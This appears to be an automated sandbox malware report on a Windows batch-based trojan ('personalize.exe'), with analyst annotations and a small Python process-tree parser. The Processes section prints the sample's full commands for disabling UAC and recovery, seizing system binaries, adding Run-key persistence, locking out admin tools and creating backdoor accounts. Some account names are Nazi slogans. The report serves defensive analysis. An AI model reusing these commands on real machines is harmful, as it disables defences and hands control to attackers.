Malware Analysis Report

2024-09-11 05:40

Sample ID 240630-q76bzsscqq
Target personalize.exe
SHA256 8fdbf406fc7490ac24b4c5f61a4b868bd1c892f5ccc4817ec306a8ec9f70e3d7
Tags
defense_evasion discovery evasion exploit persistence ransomware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8fdbf406fc7490ac24b4c5f61a4b868bd1c892f5ccc4817ec306a8ec9f70e3d7

Threat Level: Known bad

The file personalize.exe was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion exploit persistence ransomware trojan

UAC bypass

Modifies boot configuration data using bcdedit

Possible privilege escalation attempt

Sets file to hidden

Disables RegEdit via registry modification

Disables Task Manager via registry modification

Modifies file permissions

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Adds Run key to start application

Sets desktop wallpaper using registry

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Runs net.exe

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Delays execution with timeout.exe

Enumerates system info in registry

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-30 13:55

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-30 13:55

Reported

2024-06-30 13:56

Platform

win11-20240508-en

Max time kernel

63s

Max time network

66s

Command Line

"C:\Users\Admin\AppData\Local\Temp\personalize.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Note: the signature name overstates what happened. Writing EnableLUA = 0 under HKLM disables UAC outright rather than bypassing it; the write succeeding means the batch was already running elevated, and the change only takes effect after the reboot the batch forces with shutdown.exe at the end of the run.

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A

The command line (see Processes) is bcdedit /set {default} recoveryenabled no, which stops Windows from booting into the Recovery Environment after failed starts (ATT&CK T1490, Inhibit System Recovery). No file encryption appears anywhere in this trace; the ransomware tag rests on this signature and the wallpaper change alone.

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

No indicator rows were captured for this signature. The matching reg.exe command (DisableTaskMgr = 1 under the user's Policies\System key) is listed under Processes, alongside the DisableCMD, NoChangingWallpaper, NoControlPanel, NoClose, NoRun, NoThemesTab, NoFind and NoDrives policy values that the same batch sets.

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Each pair is takeown /F followed by icacls /grant everyone:F, run against taskmgr.exe, mmc.exe and msiexec.exe (see Processes). This is not an exploit: it needs SeTakeOwnershipPrivilege, which the elevated batch already holds. It strips TrustedInstaller protection so the batch can write over those binaries, and the changed owner and ACL survive file-level cleanup, so ownership must be restored and the files re-verified after removal.

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows NT Personalization tool = "C:\\Windows\\System32\\winnt64.exe" C:\Windows\system32\reg.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in System32 directory

cmd.exe creates four new executables here (colorcmd.exe, screenmelt.exe, mbr.exe, winnt64.exe) and opens taskmgr.exe, mmc.exe and msiexec.exe for modification right after the takeown/icacls calls above, i.e. the batch writes over protected system binaries. mbr.exe and winnt64.exe are then hidden with attrib +s +h. None of the dropped files is executed within the 63 s run (winnt64.exe is only registered under Run), so their behaviour is not captured in this report.

Description Indicator Process Target
File opened for modification C:\Windows\System32\screenmelt.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\mbr.exe C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\mmc.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\taskmgr.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\msiexec.exe C:\Windows\system32\cmd.exe N/A
File created C:\Windows\System32\colorcmd.exe C:\Windows\system32\cmd.exe N/A
File created C:\Windows\System32\screenmelt.exe C:\Windows\system32\cmd.exe N/A
File created C:\Windows\System32\mbr.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\colorcmd.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\system32\winnt64.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\mbr.exe C:\Windows\system32\cmd.exe N/A
File created C:\Windows\system32\winnt64.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\winnt64.exe C:\Windows\system32\attrib.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Web\\winntcus64.png" C:\Windows\system32\reg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Web\winntcus64.png C:\Windows\system32\cmd.exe N/A
File created C:\Windows\Web\winntcus64.png C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

The three 15 s waits come after the registry, ACL and account changes and sit between the msedge.exe launches (see Processes); they pace the visible payload rather than hold back execution to outlast a sandbox.

Enumerates system info in registry

These BIOS reads are made by msedge.exe, which the batch launches to open Google searches, not by the sample; treat them as browser noise.

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

All of these writes come from LogonUI.exe under .DEFAULT after the forced reboot: the logon screen re-applies accent and DWM colours once the batch has changed AccentColor and DisableLogonBackgroundImage. They are a side effect of the reboot, not a direct action of the sample.

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "70" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A

Runs net.exe

No indicator rows were captured for this signature. The Processes section shows eleven net user /add calls that create local accounts with hard-coded passwords (NTCUS, NTUSER, NTDAT, DC, cfs, leopoldII, SCHJIEAB, IZWYOKWYIEN, asap, REICHTANGLE, SIEGHEIL; ATT&CK T1136.001). Each is a persistent logon that survives deletion of the sample and has to be removed explicitly.

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\PickerHost.exe N/A
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Every pair below is a parent writing into a child it has just created (personalize.exe into cmd.exe, cmd.exe into each tool it spawns, net.exe into net1.exe); CreateProcess itself writes the child's startup parameters, and the sandbox logs each creation twice. Nothing here indicates cross-process injection; read the table as a process tree.

Description Indicator Process Target
PID 4476 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\personalize.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\personalize.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2800 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2800 wrote to memory of 892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2800 wrote to memory of 892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2800 wrote to memory of 2316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2800 wrote to memory of 2316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2800 wrote to memory of 780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2800 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2800 wrote to memory of 5040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2800 wrote to memory of 5040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2800 wrote to memory of 4004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2800 wrote to memory of 4004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2800 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2800 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2800 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2800 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2800 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2800 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2800 wrote to memory of 3284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2800 wrote to memory of 3284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2800 wrote to memory of 4108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 2956 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2800 wrote to memory of 2956 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2800 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2800 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2800 wrote to memory of 4924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 1352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 1352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2800 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4940 wrote to memory of 4832 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4940 wrote to memory of 4832 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2800 wrote to memory of 2396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2800 wrote to memory of 2396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2396 wrote to memory of 2288 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2396 wrote to memory of 2288 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
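The following is an added example, not part of the sandbox report: it parses rows in the format above into a process tree, collapsing the duplicated entries, and flags any PID written to by more than one process, which is the one pattern in such a table that would point to real injection rather than process creation. The heuristic and the row subset are the editor's; the PIDs and image paths are the ones on this page.

```python
import re
from collections import defaultdict

# Constructed sample input: a subset of the "Suspicious use of WriteProcessMemory"
# rows from this report. The sandbox emits each row twice, as on the page.
WPM_ROWS = r"""
PID 4476 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\personalize.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\personalize.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2800 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2800 wrote to memory of 2316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2800 wrote to memory of 5040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2800 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4940 wrote to memory of 4832 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2800 wrote to memory of 2396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2396 wrote to memory of 2288 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
"""

# writer pid, target pid, writer image, target image (target image starts with C:\)
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+?) (C:\\.+)$")


def parse_rows(text):
    """Return (writers, images): writers maps target pid -> set of writer pids,
    images maps pid -> image path. Duplicate rows collapse into the set."""
    writers = defaultdict(set)
    images = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        src, dst, src_img, dst_img = m.groups()
        src, dst = int(src), int(dst)
        writers[dst].add(src)
        images.setdefault(src, src_img)
        images.setdefault(dst, dst_img)
    return dict(writers), images


def lineage(writers, images):
    """Treat each single-writer relationship as parent -> child (CreateProcess writes
    the child's startup parameters) and return (parent_of, roots)."""
    parent_of = {child: next(iter(ws)) for child, ws in writers.items() if len(ws) == 1}
    roots = sorted(pid for pid in images if pid not in parent_of)
    return parent_of, roots


def multi_writer_targets(writers):
    """A process has exactly one creator; a pid written to by several distinct
    processes is a candidate for genuine cross-process injection."""
    return sorted(pid for pid, ws in writers.items() if len(ws) > 1)


def depth(pid, parent_of):
    """Number of hops from pid up to its root."""
    d = 0
    while pid in parent_of:
        pid = parent_of[pid]
        d += 1
    return d


def render_tree(parent_of, images, roots):
    """Indented text lines, one per process, depth-first from each root."""
    children = defaultdict(list)
    for child, parent in parent_of.items():
        children[parent].append(child)
    out = []

    def walk(pid, indent):
        out.append("  " * indent + f"{pid} {images[pid]}")
        for c in sorted(children[pid]):
            walk(c, indent + 1)

    for r in roots:
        walk(r, 0)
    return out


if __name__ == "__main__":
    w, im = parse_rows(WPM_ROWS)
    p, r = lineage(w, im)
    print("\n".join(render_tree(p, im, r)))
    print("multi-writer targets:", multi_writer_targets(w))
```

On this report's rows the tree has a single root (personalize.exe, PID 4476) and no multi-writer target, which is what a pure process-creation trace looks like; a row such as choice.exe writing into the bcdedit.exe PID would be the signal worth chasing.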

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\personalize.exe

"C:\Users\Admin\AppData\Local\Temp\personalize.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6234.tmp\6235.tmp\6236.bat C:\Users\Admin\AppData\Local\Temp\personalize.exe"

The wrapper immediately hands off to cmd.exe running a .bat extracted into nested .tmp directories under %TEMP%, the layout produced by batch-to-EXE converters; the batch file is the real payload and every process below is a stock Windows tool it invokes, which is why the static analysis tab reports nothing beyond an unsigned PE.

C:\Windows\system32\choice.exe

choice /c yn /n /m ""

C:\Windows\system32\choice.exe

choice /c yn /n /m ""

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe

C:\Windows\system32\cmd.exe

cmd.exe

C:\Windows\system32\attrib.exe

attrib +s +h C:\Windows\System32\mbr.exe

C:\Windows\system32\takeown.exe

takeown /F "C:\Windows\system32\taskmgr.exe"

C:\Windows\system32\icacls.exe

icacls "C:\windows\system32\taskmgr.exe" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /F "C:\Windows\system32\mmc.exe"

C:\Windows\system32\icacls.exe

icacls "C:\windows\system32\mmc.exe" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /F "C:\Windows\system32\msiexec.exe"

C:\Windows\system32\icacls.exe

icacls "C:\windows\system32\msiexec.exe" /grant everyone:F

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\Web\winntcus64.png" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\attrib.exe

attrib +s +h C:\Windows\System32\winnt64.exe

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows NT Personalization tool" /T REG_SZ /F /D "C:\Windows\System32\winnt64.exe"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoThemesTab /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f

C:\Windows\system32\net.exe

net user /add NTCUS ntcus123

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add NTCUS ntcus123

C:\Windows\system32\net.exe

net user /add NTUSER ntcus124

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add NTUSER ntcus124

C:\Windows\system32\net.exe

net user /add NTDAT ntpersonalize

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add NTDAT ntpersonalize

C:\Windows\system32\net.exe

net user /add DC discord

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add DC discord

C:\Windows\system32\net.exe

net user /add cfs belgium

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add cfs belgium

C:\Windows\system32\net.exe

net user /add leopoldII belgium

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add leopoldII belgium

C:\Windows\system32\net.exe

net user /add SCHJIEAB rykn

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add SCHJIEAB rykn

C:\Windows\system32\net.exe

net user /add IZWYOKWYIEN rykn

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add IZWYOKWYIEN rykn

C:\Windows\system32\net.exe

net user /add asap asap

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add asap asap

C:\Windows\system32\net.exe

net user /add REICHTANGLE ig1

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add REICHTANGLE ig1

C:\Windows\system32\net.exe

net user /add SIEGHEIL hitler

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add SIEGHEIL hitler

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableLogonBackgroundImage /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent" /v AccentColor /t REG_DWORD /d 0xFF0000 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\timeout.exe

timeout /t 15 /nobreak

